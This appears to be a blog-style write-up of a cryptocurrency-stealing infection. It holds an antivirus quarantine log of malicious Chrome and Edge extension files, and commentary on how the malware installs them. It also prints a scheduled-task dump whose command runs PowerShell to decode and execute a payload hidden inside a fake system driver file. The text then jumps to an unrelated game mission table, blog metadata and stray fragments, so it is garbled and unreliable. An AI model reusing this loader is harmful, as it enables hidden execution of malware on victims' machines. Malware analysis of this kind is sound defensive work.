0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_block.js, Quarantined, 5865, 1082968, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_bnb.js, Quarantined, 5865, 1082968, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_cb.js, Quarantined, 5865, 1082968, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_common.js, Quarantined, 5865, 1082968, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_content.js, Quarantined, 5865, 1082968, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_gt.js, Quarantined, 5865, 1082968, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_kuc.js, Quarantined, 5865, 1082968, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\LMRCCAKLOJBFLLEIKNQECNQECDLOCKCQ\5.3.7._0\RULES.JSON, Quarantined, 5865, 1090470, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\128.png, Quarantined, 5865, 1090470, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\content.bootstrap.js, Quarantined, 5865, 1090470, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\manifest.json, Quarantined, 5865, 1090470, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_block.js, Quarantined, 5865, 1090470, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_bnb.js, Quarantined, 5865, 1090470, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_cb.js, Quarantined, 5865, 1090470, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_common.js, Quarantined, 5865, 1090470, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_content.js, Quarantined, 5865, 1090470, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_gt.js, Quarantined, 5865, 1090470, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_kuc.js, Quarantined, 5865, 1090470, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B Trojan.BitCoinStealer, C:\WINDOWS\SYSTEM32\DRIVERS\QOTOP6\4F0F6187-8D3A-4D9B-8848-E25921799F33.SYS, Quarantined, 3900, 1055561, 1.0.61045, , ame, , 842BB565271B118499304C2CCB07DD28, 8A59A9259522FF2FA06B5F01860862C0D200D8ECEB228E39855FB7C3ACF5D3EF Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\IOIBMRBDFJBFECEIKOPRFMIFCDBCBRJQ\4.4.6._0\RULES.JSON, Quarantined, 5865, 1090470, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\_metadata\generated_indexed_rulesets\_ruleset1, Quarantined, 5865, 1090470, , , , , 96CD8447C2055A5C002F8F47706D97D2, 126203311363ACC2DB796999DF99FB3ADD785F909F8E68B45DF1CAB55AD07F01 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\128.png, Quarantined, 5865, 1090470, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\content.bootstrap.js, Quarantined, 5865, 1090470, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\manifest.json, Quarantined, 5865, 1090470, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_block.js, Quarantined, 5865, 1090470, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_bnb.js, Quarantined, 5865, 1090470, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_cb.js, Quarantined, 5865, 1090470, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_common.js, Quarantined, 5865, 1090470, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_content.js, Quarantined, 5865, 1090470, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_gt.js, Quarantined, 5865, 1090470, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_kuc.js, Quarantined, 5865, 1090470, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B Trojan.Tasker.Decoder, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\Management\Provisioning\dBt3Z\AA7B6A15-FAC1-44D8-8B31-AEF280473975, Quarantined, 15659, 1055267, 1.0.61045, , ame, , 08D97ED74B014695C9110418D96472C4, 4DC2C05854644C918AF20E5CE3B255C74D3B126D49D1A548A6D7E4243C451C05 Trojan.BitCoinMiner.E, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\Management\Provisioning\User, Quarantined, 3659, 1090462, 1.0.61045, , ame, , 934E89A3A99C184F1798775D4BE62CD4, D11427934919F664C3F27DF0E2DAECF71E1667BA6EA46D048832476C09B8F273As you can see, there's a bunch of Chrome and Edge (which are both derived from Chromium) browser extension files that are marked as Trojans, albeit BitcoinMiner as opposed to the BitcoinStealer system32 file. Don't be fooled by that, though. While it's true that antivirus software often labels harmless crypto software as malicious, in this particular case we weren't actually dealing with a legitimate mining extension but a malicious stealing one instead. The user had never installed any mining or crypto-related extensions.
And running that file seems to install the extensions on your Chromium-based browsers. Firefox-based browsers seem to be not affected by this. We figured this out when we were testing if the malware replaced the address in the Tor Browser (based on Firefox) too. It didn't, and no malicious extensions seem to have been present in the Tor browser. However, this is simply because the malware doesn't contain any Firefox extension, as opposed to some built in Firefox security feature. This is an important distinction to make, since Firefox is widely considered to be a secure browser by the general public despite being way behind Chromium in security according to some of the most prominent security researchers in the industry.Internet, Health \Microsoft\Windows\Management\Provisioning\dBt3Z\AA7B6A15-FAC1-44D8-8B31-AEF280473975 true PT59M true PT59M HighestAvailable AA-SURFACE\amer0 InteractiveToken Parallel false false false false false true true false true PT0S 1 wscript.exe /e:vbscript /b "C:\Windows\System32\zYYdBt3ZQs\4AA2C936-A6E9-4413-9AA4-72BE7EF9CFC4" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\QoToP6\4F0F6187-8D3A-4D9B-8848-E25921799F33.sys'), 2183100, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"
| Mission | Critical Failure | Failure | Success | Critical Success |
|---|---|---|---|---|
| Assassinate | 5 | 0 | 10 | 0 |
| Control Space Asset | 2 | 2 | 7 | 7 |
| Seize Space Asset | 2 | 2 | 10 | 10 |
| Coup | 3 | 0 | 5 | 5 |
| Crackdown | 0 | 0 | 2 | 0 |
| Detain | 1 | 1 | 2 | 3 |
| Extract Councilor | 0 | 0 | 1 | 1 |
| Hostile Takeover | 1 | 0 | 2 | 2 |
| Purge | 1 | 1 | 5 | 5 |
| Sabotage Facilities | 2 | 0 | 3 | 0 |
| Sabotage Hab Module | 2 | 2 | 0 | 0 |
| Sabotage Project | 2 | 0 | 3 | 0 |
| Steal Project | 2 | 0 | 3 | 0 |
| Turn Councilor | 3 | 3 | 0 | 0 |
| Cause Unrest | 2 | 0 | 0 | 0 |
| Dominate Nation | 30 | 20 | 5 | 5 |
| Assault Alien Asset * | 2 | 2 | 10 | 10 |
Brian http://www.blogger.com/profile/12325915722251482731 [email protected] Blogger 110 1 25 tag:blogger.com,1999:blog-3223468286405675937.post-4412205383418656664 ...
[index] [8995] [2340] [12459] [6461] [11186] [13145] [7457] [10933] [6428] [7819]
test2